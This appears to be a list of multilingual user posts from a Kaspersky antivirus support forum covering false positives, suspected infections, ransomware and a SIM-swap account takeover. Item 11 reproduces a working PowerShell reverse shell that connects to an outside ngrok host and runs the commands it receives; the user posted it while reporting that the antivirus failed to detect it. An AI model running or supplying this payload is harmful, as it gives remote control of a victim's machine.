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  1. I'm interested in learning more about how Kaspersky Anti-Virus can be integrated with other security solutions to provide comprehensive protection for my devices. Are there any best practices for integrating Kaspersky Anti-Virus with other security products, such as a hardware firewall or a cloud-based security service? What are the benefits and potential challenges of integrating multiple security solutions? I'd appreciate any insights or advice on this topic. Regards! Alight.
  2. good day i found today a file called etmonitor with its dll files when i opened the task manager at startup options ,it gives me the chance to disable it at startup but why is it there ? what it does ? is it a malware or something else i did click on it for properties nothing happens...clicked on to show its file location found it on C/windows/. so i googled it some sited said its 50% malware hided on the name of etmonitor.exe and some others say not .but i found someone said 100% of antiviruses didn't detect it ...is it some sort of new malware or what ? please have a look at it cuz if it is a malware and the antivirus didn't detect it its a serious problem.
  3. Hi, We have created a standalone package with Kaspersky Security Center 14, NetAgent_14.2.0.26967_KES_12.0.0.465 for Kaspersky End Point Security For Windows remote installation on Windows 10 but Microsoft Defender is deleting the installer.exe file after downloading, When we check the Defender logs its showing Threat as Even after bypassing or disabling the Windows Defender we get Unknown Publisher error. You can find the name and location different in above images as we are getting these errors in multiple devices. We are disabling Defender and Forcing unknown installer but the issue is we are having around 200+ devices and we can't manually disable and complete the installation on every device. Looking for a best solution. Thank You.
  4. Скачала файл из вложений в почте. Но не открывала его и сразу же удалила. Проверила антивирусом - ничего не нашло. Файл весит 1 кб, иконку прилагаю. Что это за файл и мог ли это быть вирус? Заражен ли компьютер? Спасибо большое!
  5. downloaded an attachment in a letter, but did not open the file. removed immediately. checked with antivirus - no threats found. the file weighed 1 kb, I attach the icon. could it be a virus and can the computer be infected with it? what is this file? Thank you!
  6. Hello, I am new to hack and penetration testing and want to be assured that I am not downloading malicious files. For context, I am running Kali Linux in a VM and want to update Python. upon running the command └─$ sudo apt update && sudo apt upgrade -y I became very aware of numerous files blocked by Kaspersky that appear to be malicious, but in reality very well may just be tools that are used to perform Hack and Penetration Testing. Please reference the screenshot below. I also will paste my report if needed, but seeing as it contains minor personal information (name of PC and my username) I don't want to do that unless absolutely necessary. Thank you in advance for the help! -Ghost
  7. Note: I rooted my device. For some reason, my tablet has been turning off without warning or shutting down at weird battery percentages (when it shut down at 83% it now showed off 38%, or even it shut down at 80% and it showed off 0%, not sure if it's a battery issue or the Trojan Is eating up battery, or it even remains at 100% for a long time and then shuts down to 0%).
  8. bu hata chrome da google da arama yaparken oluyor usb ile temiz format attım hala oluyor
  9. Sequência dos acontecimentos 1* Entraram na TIM e pegaram minha linha, transferiram para outra pessoa , dados da conta e titularidade do chip em questão . 2* Essa pessoa, se é que ela existe foi e pegou o chip, ativou em outro aparelho, a linha parou de funcionar no celular de origem . 3*Na madrugada conseguiram ativar o WhatsApp em outro aparelho, uma vez que eles estavam com a linha que recebe o SMS de ativação. 4* Pergunta chave , como ativaram o WhatsApp em outro celular mesmo com o duplo fator ativado? (senha própria minha ) essa é a pergunta. 5*Depois que consegui recuperar a linha, abri o WhatsApp e digitei minha senha que sempre usei no duplo fator de Autenticação e foi acessado normalmente Como são feitos esses golpes cibernéticos.
  10. Hola, tengo un problema con el virus del titulo, windows defender me lo detecta pero no me lo elimina, voy a buscarlo al sitio donde esta: file: C:\Users\grand\AppData\Roaming\vgjiebu. y no lo encuentro. kaspersky no lo detecta, no se que hacer para eliminarlo.
  11. Hello, I went to test the antivirus by creating several malicious payloads and it detected them all, but it did not detect a malicious payload of reverse shell in PowerShell. The firewall didn't stop the reverse shell either. Antivirus detected other reverse shell scripts in powershell, but not this one. $client = New-Object System.Net.Sockets.TCPClient('0.tcp.sa.ngrok.io',11248);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() Also tested reverse shell on port 1234. GitHub link: https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3 What should I do to further improve antivirus protection in this case?
  12. 操作系统:Windows10(64位最新版) 卡巴斯基版本:21(个人收费版,已长期使用) 今日更新卡巴斯基病毒库后,卡巴斯基反病毒软件误将 vmware-tray.exe(隶属于VMWorkStation软件)以及 hrupdate.exe(隶属于火绒安全软件)两个文件认为是病毒!!!!!!并一直执行停止进程及删除动作。 严重影响了操作系统运行稳定性。请问到底什么原因会将使用了多年的软件认为是病毒。且这这两个exe 文件数字签名均正常。 此问题请问我该如何处理…… 以下为报告内容: 组件: 系统监控 结果说明: 检测到 类型: 木马 名称: PDM:Trojan.Win32.Generic 威胁级别: 高 对象类型: 进程 对象路径: c:\program files (x86)\huorong\sysdiag\bin 对象名称: hrupdate.exe 原因: 数据库 数据库发布日期: 今天,2022/11/29 21:02:00 组件: 系统监控 结果说明: 已阻止 类型: 木马 名称: PDM:Exploit.Win32.Generic 威胁级别: 高 对象类型: 进程 对象路径: d:\vmwareworkstation 对象名称: vmware.exe 数据库发布日期: 今天,2022/11/29 16:46:00
  13. 我的卡巴斯基版本为21.3.10.319(j) 我的电脑是Windows11家庭中文版21H2版本 在某次报木马病毒后,查杀成功后,我再次进行全盘扫描,发现第一次处理错误,时间为2022.11.23(下图)其中多个文件多出了一个数据0000.res 报告"处理错误"后,我担心有问题,并确定不需要这几个文件,就直接将这几个文件夹全部删除了 但在2022.11.27我再次扫描出了两个"处理错误"的事件,我再次将两个文件夹删除了,但担心仍有问题,特在此求助 报告11.27 今天,2022/11/27 16:44:00 C:\Program Files\ASUS\ACOnePackageTemp\ZipTemp\1.01.10\MicrosoftEdgeWebView2RuntimeInstallerX64.exe\GUT\MicrosoftEdge_X64_89.0.774.50.exe.{0D50BFEC-CD6A-4F9A-964C-C7416E3ACB10} 处理错误 处理错误 今天,2022/11/27 16:44:00 C:\Program Files\ASUS\ACOnePackageTemp\ZipTemp\1.01.10\MicrosoftEdgeWebView2RuntimeInstallerX64.exe\GUT\MicrosoftEdge_X64_89.0.774.50.exe.{0D50BFEC-CD6A-4F9A-964C-C7416E3ACB10}\data0000.res 处理错误 处理错误
  14. Boa tarde, alguém sabe me informar se este email é *VERDADEIRO* ou é um virus???
  15. Boa noite. fui anexar um txt do word no gmail e meu kaspersky bloqueou o upload dando a seguinte mensagem: Download negado;Google Chrome;chrome.exe;C:\Program Files\Google\Chrome\Application\chrome.exe;C:\Program Files\Google\Chrome\Application;13644;Usuário ativo;Bloqueado;Bloqueado;HEUR:Trojan.MSOffice.Badur.gena;Trojan;Alto;Exatamente;https://mail.google.com/_/upload?authuser=0&dcp=asu-n&upload_id=ADPycdvijMtFh1dQfErMGO84Ibi13FLz8-WN6ZpHSzqiwzEk2kPXOJ2BK-LwZ4jGpTJqXMCjTXPUkG0fwwDEMrnWR5YNtw&upload_protocol=resumable;upload?authuser=0&dcp=asu-n&upload_id=ADPycdvijMtFh1dQfErMGO84Ibi13FLz8-WN6ZpHSzqiwzEk2kPXOJ2BK-LwZ4jGpTJqXMCjTXPUkG0fwwDEMrnWR5YNtw&upload_protocol=resumable;https://mail.google.com/_;Arquivo;Análise especializada como resolver este problema nao sou da área?
  16. Here's an interesting article I have read recently regarding "malware hiding inside images". https://gizmodo.com/malware-images-virus-photos-pictures-how-block-antiviru-1849572516?fbclid=IwAR0bD94-LvGKCbznJ0Dh2wNH3xb_BFz0F-sJDAX92MKtqfY7UiKtUcQHHlo I personally did not know about this until recently. I didn't know that this was possible. But of course, this technique makes sense because images are clusters of data and there's data within the data. My question is simple, as the heading implies. Can Kaspersky security suite of software scan images for malware? I've kept website scans of all URLs enabled and I want every website that I visit to be scanned by my Kaspersky antivirus. I want to know, do Kaspersky's anti viruses also scan images along with the URLs on elsewhere on a website? If not, are Kaspersky working on this feature right now? If not, then my request would be to work on this. Thanks.
  17. TR: Merhabalar. Direk konuya giriyorum Tarama da veya anlık olarak virus uyarsı vermiyor, karantinaya almıyor. Sadece raporlar da gözüküyor ve "işlenemedi" yazıyor. Fakat bir virus bulursa direk silerken bunlara hiç bir şey yapmıyor ne yapmam lazım bunlar bozuk dosyalar mı yoksa bunlar bir virus mü lütfen yardım edin. - Translation English:Hello. I'm going straight to the point. It doesn't give a virus warning during scanning or instantaneously, it doesn't quarantine. It just shows up in reports and says "failed to process". But if it finds a virus, it doesn't do anything to them while deleting it directly, what should I do, are these corrupt files or are they a virus, please help. Not: Raporları txt olarak atmak istedim: https://drive.google.com/drive/folders/1fihR-n0klil7s90t-lDhKpy-M2mj2oDE?usp=sharing ENG: I wanted to export the reports as txt
  18. Não estou conseguindo renovar a licença
  19. Je suis victime d’un virus son extension est .emmv, il a infecté tous mes fichiers (pdf, office, image...) et l’analyse avec kaspersky ne l’a pas détecté.
  20. Hello, This evening I launched Google Chrome dashboard, and I got a notification that Kaspersky had stopped a malicious download. While I'm greatful that it had stopped the download, I have to assume that my computer is compromised, right? I conducted a few full scans by both Kaspersky and Windows Defender, and they found nothing. I haven't had another download happen yet, but I'm unsure on how to check if I'm 100% safe at this point. Can I get some help or advice on what to check for next? Thanks for all the help in advance!
  21. Hello I just format my pc and downloading some programs. I'm using getintopc for downloading cracked programs like adobe photoshop and I wanted to ask is it safe to download from this website? and is there anyone got hacked after using this website?
  22. Поймал троян, антивирус его удалил, но продолжил отсылать мне подобные уведомления с запросами от rundll32 и regsvr32 с какими-то случайными IP, подозреваю, что заразили систему, можно это как-то решить без сноса винды?
  23. So today i downloaded kaspersky today, beacuse I might have gotten a RAT. Turns out my senses were good becuase i found it! BUT when i want to do something with it for example try to remove it it just start loading and nothing ever happens. :C I tried restaring my pc but still no better.
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